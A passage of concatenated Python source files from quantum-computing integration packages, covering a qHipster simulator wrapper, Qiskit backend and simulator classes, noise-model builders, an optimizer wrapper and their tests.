"/opt/intel/psxe_runtime_2019.3.199/linux/daal/lib/intel64_lin:/opt/intel/psxe_runtime_2019.3.199/linux/compiler/lib/intel64_lin:/opt/intel/psxe_runtime_2019.3.199/linux/mkl/lib/intel64_lin:/opt/intel/psxe_runtime_2019.3.199/linux/tbb/lib/intel64/gcc4.7:/opt/intel/psxe_runtime_2019.3.199/linux/ipp/lib/intel64:/opt/intel/psxe_runtime_2019.3.199/linux/mpi/intel64/libfabric/lib:/opt/intel/psxe_runtime_2019.3.199/linux/mpi/intel64/lib/release:/opt/intel/psxe_runtime_2019.3.199/linux/mpi/intel64/lib:/opt/intel/psxe_runtime_2019.3.199/linux/compiler/lib/intel64_lin",
)
os.putenv("IPPROOT", "/opt/intel/psxe_runtime_2019.3.199/linux/ipp")
os.putenv(
"FI_PROVIDER_PATH",
"/opt/intel/psxe_runtime_2019.3.199/linux/mpi/intel64/libfabric/lib/prov",
)
os.putenv(
"CLASSPATH",
"/opt/intel/psxe_runtime_2019.3.199/linux/daal/lib/daal.jar:/opt/intel/psxe_runtime_2019.3.199/linux/mpi/intel64/lib/mpi.jar",
)
os.putenv(
"CPATH",
"/opt/intel/psxe_runtime_2019.3.199/linux/daal/include:/opt/intel/psxe_runtime_2019.3.199/linux/mkl/include:/opt/intel/psxe_runtime_2019.3.199/linux/tbb/include:/opt/intel/psxe_runtime_2019.3.199/linux/ipp/include:",
)
os.putenv(
"NLSPATH",
"/opt/intel/psxe_runtime_2019.3.199/linux/mkl/lib/intel64_lin/locale/%l_%t/%N:/opt/intel/psxe_runtime_2019.3.199/linux/compiler/lib/intel64_lin/locale/%l_%t/%N",
)
os.putenv(
"LIBRARY_PATH",
"/opt/intel/psxe_runtime_2019.3.199/linux/daal/lib/intel64_lin:/opt/intel/psxe_runtime_2019.3.199/linux/compiler/lib/intel64_lin:/opt/intel/psxe_runtime_2019.3.199/linux/mkl/lib/intel64_lin:/opt/intel/psxe_runtime_2019.3.199/linux/tbb/lib/intel64/gcc4.7:/opt/intel/psxe_runtime_2019.3.199/linux/ipp/lib/intel64:/opt/intel/psxe_runtime_2019.3.199/linux/mpi/intel64/libfabric/lib:/opt/intel/psxe_runtime_2019.3.199/linux/compiler/lib/intel64_lin",
)
os.putenv("DAALROOT", "/opt/intel/psxe_runtime_2019.3.199/linux/daal")
os.putenv(
"MIC_LD_LIBRARY_PATH",
"/opt/intel/psxe_runtime_2019.3.199/linux/compiler/lib/intel64_lin_mic",
)
os.putenv("MANPATH", "/opt/intel/psxe_runtime_2019.3.199/linux/mpi/man:")
os.putenv("CPLUS_INCLUDE_PATH", "/app/json_parser/include")
os.putenv("MKLROOT", "/opt/intel/psxe_runtime_2019.3.199/linux/mkl")
os.putenv(
"PATH",
"/opt/intel/psxe_runtime_2019.3.199/linux/mpi/intel64/libfabric/bin:/opt/intel/psxe_runtime_2019.3.199/linux/mpi/intel64/bin:/opt/intel/psxe_runtime_2019.3.199/linux/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
)
os.putenv("TBBROOT", "/opt/intel/psxe_runtime_2019.3.199/linux/tbb")
os.putenv(
"PKG_CONFIG_PATH",
"/opt/intel/psxe_runtime_2019.3.199/linux/mkl/bin/pkgconfig",
)
os.putenv("I_MPI_ROOT", "/opt/intel/psxe_runtime_2019.3.199/linux/mpi")
def run_circuit_and_measure(self, circuit, **kwargs):
wavefunction = self.get_wavefunction(circuit)
return Measurements(sample_from_wavefunction(wavefunction, self.n_samples))
def get_exact_expectation_values(self, circuit, qubit_operator, **kwargs):
self.number_of_circuits_run += 1
self.number_of_jobs_run += 1
circuit = make_circuit_qhipster_compatible(circuit)
save_circuit(circuit, "./temp_qhipster_circuit.json")
if isinstance(qubit_operator, SymbolicOperator):
save_symbolic_operator(qubit_operator, "./temp_qhipster_operator.json")
else:
raise Exception(
"Unsupported type: "
+ type(qubit_operator)
+ "QHipster works only with openfermion.SymbolicOperator"
)
# Parse JSON files for qhipster usage
subprocess.call(
["/app/json_parser/json_to_qasm.o", "./temp_qhipster_circuit.json"]
)
subprocess.call(
[
"/app/json_parser/qubitop_to_paulistrings.o",
"./temp_qhipster_operator.json",
]
)
# Run simulation
subprocess.call(
[
"/app/zapata/zapata_interpreter_no_mpi_get_exp_vals.out",
"./temp_qhipster_circuit.txt",
str(self.nthreads),
"./temp_qhipster_operator.txt",
"./expectation_values.json",
]
)
expectation_values = load_expectation_values("./expectation_values.json")
term_index = 0
for term in qubit_operator.terms:
expectation_values.values[term_index] = np.real(
qubit_operator.terms[term] * expectation_values.values[term_index]
)
term_index += 1
return expectation_values
def get_wavefunction(self, circuit):
super().get_wavefunction(circuit)
# First, save the circuit object to file in JSON format
circuit = make_circuit_qhipster_compatible(circuit)
save_circuit(circuit, "./temp_qhipster_circuit.json")
# Parse JSON files for qhipster usage
subprocess.call(
["/app/json_parser/json_to_qasm.o", "./temp_qhipster_circuit.json"]
)
# Run simulation
subprocess.call(
[
"/app/zapata/zapata_interpreter_no_mpi_get_wf.out",
"./temp_qhipster_circuit.txt",
str(self.nthreads),
"./temp_qhipster_wavefunction.json",
]
)
wavefunction = load_wavefunction("./temp_qhipster_wavefunction.json")
os.remove("./temp_qhipster_circuit.json")
os.remove("./temp_qhipster_wavefunction.json")
return wavefunction
--- FILE SEPARATOR ---
import pytest
from zquantum.core.interfaces.backend_test import (
QuantumSimulatorTests,
QuantumSimulatorGatesTest,
)
from .simulator import QHipsterSimulator
@pytest.fixture(
params=[
{},
{"n_samples": 1000},
]
)
def backend(request):
return QHipsterSimulator(**request.param)
@pytest.fixture(
params=[
{},
]
)
def wf_simulator(request):
return QHipsterSimulator(**request.param)
class TestQHipster(QuantumSimulatorTests):
pass
class TestQHipsterGates(QuantumSimulatorGatesTest):
gates_to_exclude = ["XX", "YY", "ZZ"]
pass
--- FILE SEPARATOR ---
from openfermion import SymbolicOperator
import numpy as np
import json
def save_symbolic_operator(op: SymbolicOperator, filename: str) -> None:
dictionary = {}
dictionary["expression"] = convert_symbolic_op_to_string(op)
with open(filename, "w") as f:
f.write(json.dumps(dictionary, indent=2))
def convert_symbolic_op_to_string(op: SymbolicOperator) -> str:
"""Convert an openfermion SymbolicOperator to a string. This differs from the
SymbolicOperator's __str__ method only in that we preserve the order of terms.
Adapted from openfermion.
Args:
op (openfermion.ops.SymbolicOperator): the operator
Returns
string: the string representation of the operator
"""
if not op.terms:
return "0"
string_rep = ""
for term, coeff in op.terms.items():
if np.abs(coeff) < 0.00000001:
continue
tmp_string = "{} [".format(coeff)
for factor in term:
index, action = factor
action_string = op.action_strings[op.actions.index(action)]
if op.action_before_index:
tmp_string += "{}{} ".format(action_string, index)
else:
tmp_string += "{}{} ".format(index, action_string)
string_rep += "{}] +\n".format(tmp_string.strip())
return string_rep[:-3]
def make_circuit_qhipster_compatible(circuit):
circuit = replace_identity_gates_with_rx(circuit)
circuit = replace_XX_YY_ZZ_gates_with_decomposition(circuit)
return circuit
def replace_identity_gates_with_rx(circuit):
for gate in circuit.gates:
if gate.name == "I":
gate.name = "Rx"
gate.params = [0]
return circuit
def replace_XX_YY_ZZ_gates_with_decomposition(circuit):
for gate in circuit.gates:
if gate.name == "XX":
raise NotImplementedError(
"XX gate is currently not supported for qHipster integration."
)
elif gate.name == "YY":
raise NotImplementedError(
"YY gate is currently not supported for qHipster integration."
)
elif gate.name == "ZZ":
raise NotImplementedError(
"ZZ gate is currently not supported for qHipster integration."
)
return circuit
|
[
"/src/python/qeqhipster/simulator.py",
"/src/python/qeqhipster/simulator_test.py",
"/src/python/qeqhipster/utils.py"
] |
00mjk/qe-qiskit
|
from qiskit import IBMQ, execute, QuantumRegister
from qiskit.ignis.mitigation.measurement import (
complete_meas_cal,
CompleteMeasFitter,
)
from qiskit.providers.ibmq.exceptions import IBMQAccountError
from openfermion.ops import IsingOperator
from zquantum.core.openfermion import change_operator_type
from zquantum.core.interfaces.backend import QuantumBackend
from zquantum.core.measurement import (
expectation_values_to_real,
Measurements,
)
class QiskitBackend(QuantumBackend):
def __init__(
self,
device_name,
n_samples=None,
hub="ibm-q",
group="open",
project="main",
api_token=None,
batch_size=75,
readout_correction=False,
optimization_level=0,
**kwargs
):
"""Get a qiskit QPU that adheres to the
zquantum.core.interfaces.backend.QuantumBackend
Args:
device_name (string): the name of the device
n_samples (int): the number of samples to use when running the device
hub (string): IBMQ hub
group (string): IBMQ group
project (string): IBMQ project
api_token (string): IBMQ Api Token
readout_correction (bool): indication of whether or not to use basic readout correction
optimization_level (int): optimization level for the default qiskit transpiler (0, 1, 2, or 3)
Returns:
qeqiskit.backend.QiskitBackend
"""
self.device_name = device_name
self.n_samples = n_samples
self.batch_size = batch_size
if api_token is not None:
try:
IBMQ.enable_account(api_token)
except IBMQAccountError as e:
if (
e.message
!= "An IBM Quantum Experience account is already in use for the session."
):
raise RuntimeError(e)
provider = IBMQ.get_provider(hub=hub, group=group, project=project)
self.device = provider.get_backend(name=self.device_name)
self.readout_correction = readout_correction
self.readout_correction_filter = None
self.optimization_level = optimization_level
def run_circuit_and_measure(self, circuit, **kwargs):
"""Run a circuit and measure a certain number of bitstrings. Note: the
number of bitstrings measured is derived from self.n_samples
Args:
circuit (zquantum.core.circuit.Circuit): the circuit to prepare the state
Returns:
a list of bitstrings (a list of tuples)
"""
num_qubits = len(circuit.qubits)
ibmq_circuit = circuit.to_qiskit()
ibmq_circuit.barrier(range(num_qubits))
ibmq_circuit.measure(range(num_qubits), range(num_qubits))
# Run job on device and get counts
raw_counts = (
execute(
ibmq_circuit,
self.device,
shots=self.n_samples,
optimization_level=self.optimization_level,
)
.result()
.get_counts()
)
if self.readout_correction:
raw_counts = self.apply_readout_correction(raw_counts, kwargs)
# qiskit counts object maps bitstrings in reversed order to ints, so we must flip the bitstrings
reversed_counts = {}
for bitstring in raw_counts.keys():
reversed_counts[bitstring[::-1]] = int(raw_counts[bitstring])
measurements = Measurements.from_counts(reversed_counts)
return measurements
def run_circuitset_and_measure(self, circuitset, **kwargs):
"""Run a set of circuits and measure a certain number of bitstrings.
Note: the number of bitstrings measured is derived from self.n_samples
Args:
circuitset (List[zquantum.core.circuit.Circuit]): the circuits to run
Returns:
a list of lists of bitstrings (a list of lists of tuples)
"""
ibmq_circuitset = []
for circuit in circuitset:
num_qubits = len(circuit.qubits)
ibmq_circuit = circuit.to_qiskit()
ibmq_circuit.barrier(range(num_qubits))
ibmq_circuit.measure(range(num_qubits), range(num_qubits))
ibmq_circuitset.append(ibmq_circuit)
# Run job on device and get counts
experiments = []
while len(experiments) * self.batch_size < len(circuitset):
experiments.append(
[
ibmq_circuitset[i]
for i in range(
len(experiments) * self.batch_size,
min(
len(experiments) * self.batch_size + self.batch_size,
len(circuitset),
),
)
]
)
jobs = [
execute(
experiment,
self.device,
shots=self.n_samples,
optimization_level=self.optimization_level,
)
for experiment in experiments
]
measurements_set = []
for i, ibmq_circuit in enumerate(ibmq_circuitset):
job = jobs[int(i / self.batch_size)]
circuit_counts = job.result().get_counts(ibmq_circuit)
if self.readout_correction:
circuit_counts = self.apply_readout_correction(circuit_counts, kwargs)
# qiskit counts object maps bitstrings in reversed order to ints, so we must flip the bitstrings
reversed_counts = {}
for bitstring in circuit_counts.keys():
reversed_counts[bitstring[::-1]] = int(circuit_counts[bitstring])
measurements = Measurements.from_counts(reversed_counts)
measurements_set.append(measurements)
return measurements_set
def get_expectation_values(self, circuit, operator, **kwargs):
"""Run a circuit and measure the expectation values with respect to a
given operator. Note: the number of bitstrings measured is derived
from self.n_samples - if self.n_samples = None, then this will use
self.get_exact_expectation_values
Args:
circuit (zquantum.core.circuit.Circuit): the circuit to prepare the state
operator (openfermion.ops.IsingOperator or openfermion.ops.QubitOperator): the operator to measure
Returns:
zquantum.core.measurement.ExpectationValues: the expectation values of each term in the operator
"""
operator = change_operator_type(operator, IsingOperator)
measurements = self.run_circuit_and_measure(circuit)
expectation_values = measurements.get_expectation_values(operator)
expectation_values = expectation_values_to_real(expectation_values)
return expectation_values
def get_expectation_values_for_circuitset(self, circuitset, operator, **kwargs):
"""Run a set of circuits and measure the expectation values with respect to a
given operator.
Args:
circuitset (list of zquantum.core.circuit.Circuit objects): the circuits to prepare the states
operator (openfermion.ops.IsingOperator or openfermion.ops.QubitOperator): the operator to measure
Returns:
list of zquantum.core.measurement.ExpectationValues objects: a list of the expectation values of each
term in the operator with respect to the various state preparation circuits
"""
operator = change_operator_type(operator, IsingOperator)
measurements_set = self.run_circuitset_and_measure(circuitset)
expectation_values_set = []
for measurements in measurements_set:
expectation_values = measurements.get_expectation_values(operator)
expectation_values = expectation_values_to_real(expectation_values)
expectation_values_set.append(expectation_values)
return expectation_values_set
def apply_readout_correction(self, counts, qubit_list=None, **kwargs):
if self.readout_correction_filter is None:
for key in counts.keys():
num_qubits = len(key)
break
if qubit_list is None or qubit_list == {}:
qubit_list = [i for i in range(num_qubits)]
qr = QuantumRegister(num_qubits)
meas_cals, state_labels = complete_meas_cal(qubit_list=qubit_list, qr=qr)
# Execute the calibration circuits
job = execute(meas_cals, self.device, shots=self.n_samples)
cal_results = job.result()
# Make a calibration matrix
meas_fitter = CompleteMeasFitter(cal_results, state_labels)
# Create a measurement filter from the calibration matrix
self.readout_correction_filter = meas_fitter.filter
mitigated_counts = self.readout_correction_filter.apply(counts)
return mitigated_counts
--- FILE SEPARATOR ---
import pytest
import os
from pyquil import Program
from pyquil.gates import X, CNOT
from qiskit import IBMQ
from qiskit.providers.exceptions import QiskitBackendNotFoundError
from zquantum.core.circuit import Circuit
from zquantum.core.interfaces.backend_test import QuantumBackendTests
from .backend import QiskitBackend
@pytest.fixture(
params=[
{
"device_name": "ibmq_qasm_simulator",
"n_samples": 1,
"api_token": os.getenv("ZAPATA_IBMQ_API_TOKEN"),
},
]
)
def backend(request):
return QiskitBackend(**request.param)
class TestQiskitBackend(QuantumBackendTests):
def test_run_circuitset_and_measure(self, backend):
# Given
num_circuits = 10
circuit = Circuit(Program(X(0), CNOT(1, 2)))
n_samples = 100
# When
backend.n_samples = n_samples
measurements_set = backend.run_circuitset_and_measure([circuit] * num_circuits)
# Then
assert len(measurements_set) == num_circuits
for measurements in measurements_set:
assert len(measurements.bitstrings) == n_samples
# Then (since SPAM error could result in unexpected bitstrings, we make sure the most common bitstring is
# the one we expect)
counts = measurements.get_counts()
assert max(counts, key=counts.get) == "100"
def test_readout_correction_works_run_circuit_and_measure(self):
# Given
ibmq_api_token = os.getenv("ZAPATA_IBMQ_API_TOKEN")
backend = QiskitBackend(
device_name="ibmq_qasm_simulator",
n_samples=1000,
api_token=ibmq_api_token,
readout_correction=True,
)
circuit = Circuit(Program(X(0), CNOT(1, 2)))
# When
backend.run_circuit_and_measure(circuit)
# Then
assert backend.readout_correction
assert backend.readout_correction_filter is not None
def test_readout_correction_works_run_circuitset_and_measure(self):
# Given
ibmq_api_token = os.getenv("ZAPATA_IBMQ_API_TOKEN")
backend = QiskitBackend(
device_name="ibmq_qasm_simulator",
n_samples=1000,
api_token=ibmq_api_token,
readout_correction=True,
)
circuit = Circuit(Program(X(0), CNOT(1, 2)))
# When
backend.run_circuitset_and_measure([circuit] * 10)
# Then
assert backend.readout_correction
assert backend.readout_correction_filter is not None
def test_device_that_does_not_exist(self):
# Given/When/Then
with pytest.raises(QiskitBackendNotFoundError):
QiskitBackend("DEVICE DOES NOT EXIST")
--- FILE SEPARATOR ---
from .basic import get_qiskit_noise_model
--- FILE SEPARATOR ---
import numpy as np
import qiskit.providers.aer.noise as AerNoise
from qiskit import IBMQ
from qiskit.providers.ibmq.exceptions import IBMQAccountError
from zquantum.core.circuit import CircuitConnectivity
from qiskit.providers.aer.noise import (amplitude_damping_error,
phase_damping_error,
phase_amplitude_damping_error,
pauli_error)
from qiskit.providers.aer.noise import NoiseModel
from qiskit.quantum_info import Kraus
def get_qiskit_noise_model(
device_name, hub="ibm-q", group="open", project="main", api_token=None
):
""" Get a qiskit noise model to use noisy simulations with a qiskit simulator
Args:
device_name (string): The name of the device trying to be emulated
hub (string): The ibmq hub (see qiskit documentation)
group (string): The ibmq group (see qiskit documentation)
project (string): The ibmq project (see qiskit documentation)
api_token (string): The ibmq api token (see qiskit documentation)
Returns:
qiskit.providers.aer.noise.NoiseModel
zquantum.core.circuit.CircuitConnectivity: the qubit connectivity of the device
"""
if api_token is not None and api_token is not "None":
try:
IBMQ.enable_account(api_token)
except IBMQAccountError as e:
if (
e.message
!= "An IBM Quantum Experience account is already in use for the session."
):
raise RuntimeError(e)
# Get qiskit noise model from qiskit
provider = IBMQ.get_provider(hub=hub, group=group, project=project)
noisy_device = provider.get_backend(device_name)
noise_model = AerNoise.NoiseModel.from_backend(noisy_device)
coupling_map = noisy_device.configuration().coupling_map
return noise_model, CircuitConnectivity(coupling_map)
def create_amplitude_damping_noise(T_1, t_step=10e-9):
""" Creates an amplitude damping noise model
Args:
T_1 (float) : Relaxation time (seconds)
t_step (float) : Discretized time step over which the relaxation occurs over (seconds)
Returns:
qiskit.providers.aer.noise.NoiseModel
"""
gamma = (1 - pow(np.e, - 1/T_1*t_step))
error = amplitude_damping_error(gamma)
gate_error = error.tensor(error)
noise_model = NoiseModel()
noise_model.add_all_qubit_quantum_error(error, ['id', 'u3'])
noise_model.add_all_qubit_quantum_error(gate_error, ['cx'])
return noise_model
def create_phase_damping_noise(T_2, t_step=10e-9):
""" Creates a dephasing noise model
Args:
T_2 (float) : dephasing time (seconds)
t_step (float) : Discretized time step over which the relaxation occurs over (seconds)
Returns:
qiskit.providers.aer.noise.NoiseModel
"""
gamma = (1 - pow(np.e, - 1/T_2*t_step))
error = phase_damping_error(gamma)
gate_error = error.tensor(error)
noise_model = NoiseModel()
noise_model.add_all_qubit_quantum_error(error, ['id', 'u3'])
noise_model.add_all_qubit_quantum_error(gate_error, ['cx'])
return noise_model
def create_phase_and_amplitude_damping_error(T_1, T_2, t_step=10e-9):
""" Creates a noise model that does both phase and amplitude damping
Args:
T_1 (float) : Relaxation time (seconds)
T_2 (float) : dephasing time (seonds)
t_step (float) : Discretized time step over which the relaxation occurs over (seconds)
Returns:
qiskit.providers.aer.noise.NoiseModel
"""
param_amp = (1 - pow(np.e, - 1/T_1*t_step))
param_phase = (1 - pow(np.e, - 1/T_2*t_step))
error = phase_amplitude_damping_error(param_amp, param_phase)
gate_error = error.tensor(error)
noise_model = NoiseModel()
noise_model.add_all_qubit_quantum_error(error, ['id', 'u3'])
noise_model.add_all_qubit_quantum_error(gate_error, ['cx'])
return noise_model
def create_pta_channel(T_1, T_2, t_step=10e-9):
""" Creates a noise model that does both phase and amplitude damping but in the
Pauli Twirling Approximation discussed the following reference
https://arxiv.org/pdf/1305.2021.pdf
Args:
T_1 (float) : Relaxation time (seconds)
T_2 (float) : dephasing time (seconds)
t_step (float) : Discretized time step over which the relaxation occurs over (seconds)
Returns:
qiskit.providers.aer.noise.NoiseModel
"""
if T_1 == T_2:
t_phi = 2*T_1
elif 2*T_1 == T_2:
raise RuntimeError(" T_2 == 2*T_1 only in a pure amplitude damping case ")
else:
t_phi = T_2 - 2*T_1
p_x = 0.25*(1- pow(np.e, - t_step/T_1))
p_y = 0.25*(1- pow(np.e, - t_step/T_1))
exp_1 = pow(np.e, -t_step/(2*T_1))
exp_2 = pow(np.e, -t_step/t_phi)
p_z = (0.5 - p_x - 0.5*exp_1*exp_2)
p_i = 1 - p_x - p_y - p_z
errors = [('X', p_x), ('Y', p_y), ('Z', p_z), ('I', p_i)]
pta_error = pauli_error(errors)
noise_model = NoiseModel()
noise_model.add_all_qubit_quantum_error(pta_error, ['id', 'u3'])
gate_error = pta_error.tensor(pta_error)
noise_model.add_all_qubit_quantum_error(gate_error, ['cx'])
return noise_model
def get_kraus_matrices_from_ibm_noise_model(noise_model):
"""Gets the kraus operators from a pre defined noise model
Args:
noise_model (qiskit.providers.aer.noise.NoiseModel): Noise model for circuit
Return
dict_of_kraus_operators(dict): A dictionary labelled by keys which are the basis gates and values are the list of kraus operators
"""
retrieved_quantum_error_dict = noise_model._default_quantum_errors
dict_of_kraus_operators = { gate: Kraus(retrieved_quantum_error_dict[gate]).data for gate in retrieved_quantum_error_dict }
return dict_of_kraus_operators
--- FILE SEPARATOR ---
from .optimizer import QiskitOptimizer
--- FILE SEPARATOR ---
from zquantum.core.history.recorder import recorder
from zquantum.core.interfaces.optimizer import Optimizer, optimization_result
from qiskit.aqua.components.optimizers import SPSA, ADAM
from scipy.optimize import OptimizeResult
class _CostFunctionWrapper:
def __init__(self, cost_function):
self.cost_function = cost_function
self.number_of_calls = 0
def __call__(self, params):
self.number_of_calls += 1
return self.cost_function(params)
class QiskitOptimizer(Optimizer):
def __init__(self, method, options={}):
"""
Args:
method(str): specifies optimizer to be used. Currently supports "ADAM", "AMSGRAD" and "SPSA".
options(dict): dictionary with additional options for the optimizer.
Supported values for the options dictionary:
Options:
keep_value_history(bool): boolean flag indicating whether the history of evaluations should be stored or not.
**kwargs: options specific for particular scipy optimizers.
"""
self.method = method
self.options = options
self.keep_value_history = self.options.pop("keep_value_history", False)
def minimize(self, cost_function, initial_params=None):
"""
Minimizes given cost function using optimizers from Qiskit Aqua.
Args:
cost_function(): python method which takes numpy.ndarray as input
initial_params(np.ndarray): initial parameters to be used for optimization
Returns:
optimization_results(scipy.optimize.OptimizeResults): results of the optimization.
"""
history = []
if self.method == "SPSA":
optimizer = SPSA(**self.options)
elif self.method == "ADAM" or self.method == "AMSGRAD":
if self.method == "AMSGRAD":
self.options["amsgrad"] = True
optimizer = ADAM(**self.options)
number_of_variables = len(initial_params)
if self.keep_value_history:
cost_function_wrapper = recorder(cost_function)
else:
cost_function_wrapper = _CostFunctionWrapper(cost_function)
gradient_function = None
if hasattr(cost_function, "gradient") and callable(
getattr(cost_function, "gradient")
):
gradient_function = cost_function.gradient
solution, value, nit = optimizer.optimize(
num_vars=number_of_variables,
objective_function=cost_function_wrapper,
initial_point=initial_params,
gradient_function=gradient_function,
)
if self.keep_value_history:
nfev = len(cost_function_wrapper.history)
history = cost_function_wrapper.history
else:
nfev = cost_function_wrapper.number_of_calls
history = []
return optimization_result(
opt_value=value,
opt_params=solution,
nit=nit,
history=history,
nfev=nfev,
)
--- FILE SEPARATOR ---
import unittest
from zquantum.core.history.recorder import recorder
from .optimizer import QiskitOptimizer
from zquantum.core.interfaces.optimizer_test import OptimizerTests
import numpy as np
from zquantum.core.interfaces.optimizer_test import sum_x_squared
class QiskitOptimizerTests(unittest.TestCase, OptimizerTests):
def setUp(self):
self.optimizers = [
QiskitOptimizer(method="ADAM"),
QiskitOptimizer(
method="SPSA",
options={
"max_trials": int(1e5),
"c0": 1e-3,
"c1": 1e-4,
"c2": 1e-3,
"c3": 1e-4,
},
),
QiskitOptimizer(
method="AMSGRAD", options={"maxiter": 2e5, "tol": 1e-9, "lr": 1e-4}
),
]
def test_optimizer_succeeds_on_cost_function_without_gradient(self):
for optimizer in self.optimizers:
cost_function = sum_x_squared
results = optimizer.minimize(
cost_function, initial_params=np.array([1, -1])
)
self.assertAlmostEqual(results.opt_value, 0, places=5)
self.assertAlmostEqual(results.opt_params[0], 0, places=4)
self.assertAlmostEqual(results.opt_params[1], 0, places=4)
self.assertIn("nfev", results.keys())
self.assertIn("nit", results.keys())
self.assertIn("opt_value", results.keys())
self.assertIn("opt_params", results.keys())
self.assertIn("history", results.keys())
def test_optimizer_records_history_if_keep_value_history_is_added_as_option(self):
optimizer = QiskitOptimizer(
method="SPSA",
options={"keep_value_history": True}
)
# To check that history is recorded correctly, we wrap cost_function
# with a recorder. Optimizer should wrap it a second time and
# therefore we can compare two histories to see if they agree.
cost_function = recorder(sum_x_squared)
result = optimizer.minimize(cost_function, np.array([-1, 1]))
self.assertEqual(result.history, cost_function.history)
def test_optimizier_does_not_record_history_if_keep_value_history_is_set_to_false(self):
optimizer = QiskitOptimizer(
method="SPSA",
options={"keep_value_history": False}
)
result = optimizer.minimize(sum_x_squared, np.array([-2, 0.5]))
self.assertEqual(result.history, [])
def _test_optimizer_does_not_record_history_if_keep_value_history_is_not_present_in_options(self):
self.assertTrue(True)
optimizer = QiskitOptimizer(
method="AMSGRAD",
)
result = optimizer.minimize(sum_x_squared, np.array([-2, 0.5]))
self.assertEqual(result.history, [])
--- FILE SEPARATOR ---
import numpy as np
from qiskit import Aer, IBMQ, execute
from qiskit.providers.ibmq.exceptions import IBMQAccountError
from qiskit.transpiler import CouplingMap
from pyquil.wavefunction import Wavefunction
from openfermion.ops import IsingOperator
from zquantum.core.openfermion import expectation, change_operator_type
from zquantum.core.interfaces.backend import QuantumSimulator
from zquantum.core.measurement import (
expectation_values_to_real,
ExpectationValues,
Measurements,
)
class QiskitSimulator(QuantumSimulator):
def __init__(
self,
device_name,
n_samples=None,
noise_model=None,
device_connectivity=None,
basis_gates=None,
api_token=None,
optimization_level=0,
**kwargs,
):
"""Get a qiskit device (simulator or QPU) that adheres to the
zquantum.core.interfaces.backend.QuantumSimulator
Args:
device_name (string): the name of the device
n_samples (int): the number of samples to use when running the device
noise_model (qiskit.providers.aer.noise.NoiseModel): an optional
noise model to pass in for noisy simulations
device_connectivity (zquantum.core.circuit.CircuitConnectivity): an optional input of an object representing
the connectivity of the device that will be used in simulations
basis_gates (list): an optional input of the list of basis gates
used in simulations
api_token (string): IBMQ Api Token
optimization_level (int): optimization level for the default qiskit transpiler (0, 1, 2, or 3)
Returns:
qeqiskit.backend.QiskitSimulator
"""
self.device_name = device_name
self.n_samples = n_samples
self.noise_model = noise_model
self.device_connectivity = device_connectivity
self.num_circuits_run = 0
self.num_jobs_run = 0
if basis_gates is None and self.noise_model is not None:
self.basis_gates = self.noise_model.basis_gates
else:
self.basis_gates = basis_gates
if api_token is not None:
try:
IBMQ.enable_account(api_token)
except IBMQAccountError as e:
if (
e.message
!= "An IBM Quantum Experience account is already in use for the session."
):
raise RuntimeError(e)
self.optimization_level = optimization_level
self.get_device(**kwargs)
def get_device(self, noisy=False, **kwargs):
"""Get the ibm device used for executing circuits
Args:
noisy (bool): a boolean indicating if the user wants to use noisy
simulations
Returns:
The ibm device that can use the ibm execute api
"""
# If not doing noisy simulation...
if len(Aer.backends(self.device_name)) > 0:
self.device = Aer.get_backend(self.device_name)
else:
raise RuntimeError(
"Could not find simulator with name: {}".format(self.device_name)
)
def run_circuit_and_measure(self, circuit, **kwargs):
"""Run a circuit and measure a certain number of bitstrings. Note: the
number of bitstrings measured is derived from self.n_samples
Args:
circuit (zquantum.core.circuit.Circuit): the circuit to prepare the state
Returns:
a list of bitstrings (a list of tuples)
"""
self.num_circuits_run += 1
self.num_jobs_run += 1
num_qubits = len(circuit.qubits)
ibmq_circuit = circuit.to_qiskit()
ibmq_circuit.barrier(range(num_qubits))
ibmq_circuit.measure(range(num_qubits), range(num_qubits))
coupling_map = None
if self.device_connectivity is not None:
coupling_map = CouplingMap(self.device_connectivity.connectivity)
# Run job on device and get counts
raw_counts = (
execute(
ibmq_circuit,
self.device,
shots=self.n_samples,
noise_model=self.noise_model,
coupling_map=coupling_map,
basis_gates=self.basis_gates,
optimization_level=self.optimization_level,
)
.result()
.get_counts()
)
# qiskit counts object maps bitstrings in reversed order to ints, so we must flip the bitstrings
reversed_counts = {}
for bitstring in raw_counts.keys():
reversed_counts[bitstring[::-1]] = raw_counts[bitstring]
return Measurements.from_counts(reversed_counts)
def run_circuitset_and_measure(self, circuitset, **kwargs):
"""Run a set of circuits and measure a certain number of bitstrings.
Note: the number of bitstrings measured is derived from self.n_samples
Args:
circuit (zquantum.core.circuit.Circuit): the circuit to prepare the state
Returns:
a list of lists of bitstrings (a list of lists of tuples)
"""
self.num_circuits_run += len(circuitset)
self.num_jobs_run += 1
ibmq_circuitset = []
for circuit in circuitset:
num_qubits = len(circuit.qubits)
ibmq_circuit = circuit.to_qiskit()
ibmq_circuit.barrier(range(num_qubits))
ibmq_circuit.measure(range(num_qubits), range(num_qubits))
ibmq_circuitset.append(ibmq_circuit)
coupling_map = None
if self.device_connectivity is not None:
coupling_map = CouplingMap(self.device_connectivity.connectivity)
# Run job on device and get counts
job = execute(
ibmq_circuitset,
self.device,
shots=self.n_samples,
noise_model=self.noise_model,
coupling_map=coupling_map,
basis_gates=self.basis_gates,
optimization_level=self.optimization_level,
)
measurements_set = []
for i, ibmq_circuit in enumerate(ibmq_circuitset):
circuit_counts = job.result().get_counts(ibmq_circuit)
# qiskit counts object maps bitstrings in reversed order to ints, so we must flip the bitstrings
reversed_counts = {}
for bitstring in circuit_counts.keys():
reversed_counts[bitstring[::-1]] = circuit_counts[bitstring]
measurements = Measurements.from_counts(reversed_counts)
measurements_set.append(measurements)
return measurements_set
def get_expectation_values(self, circuit, qubit_operator, **kwargs):
"""Run a circuit and measure the expectation values with respect to a
given operator. Note: the number of bitstrings measured is derived
from self.n_samples - if self.n_samples = None, then this will use
self.get_exact_expectation_values
Args:
circuit (zquantum.core.circuit.Circuit): the circuit to prepare the state
qubit_operator (openfermion.ops.QubitOperator): the operator to measure
Returns:
zquantum.core.measurement.ExpectationValues: the expectation values
of each term in the operator
"""
self.num_circuits_run += 1
self.num_jobs_run += 1
if self.n_samples == None:
return self.get_exact_expectation_values(circuit, qubit_operator, **kwargs)
else:
operator = change_operator_type(qubit_operator, IsingOperator)
measurements = self.run_circuit_and_measure(circuit)
expectation_values = measurements.get_expectation_values(operator)
expectation_values = expectation_values_to_real(expectation_values)
return expectation_values
def get_exact_expectation_values(self, circuit, qubit_operator, **kwargs):
"""Run a circuit to prepare a wavefunction and measure the exact
expectation values with respect to a given operator.
Args:
circuit (zquantum.core.circuit.Circuit): the circuit to prepare the state
qubit_operator (openfermion.ops.QubitOperator): the operator to measure
Returns:
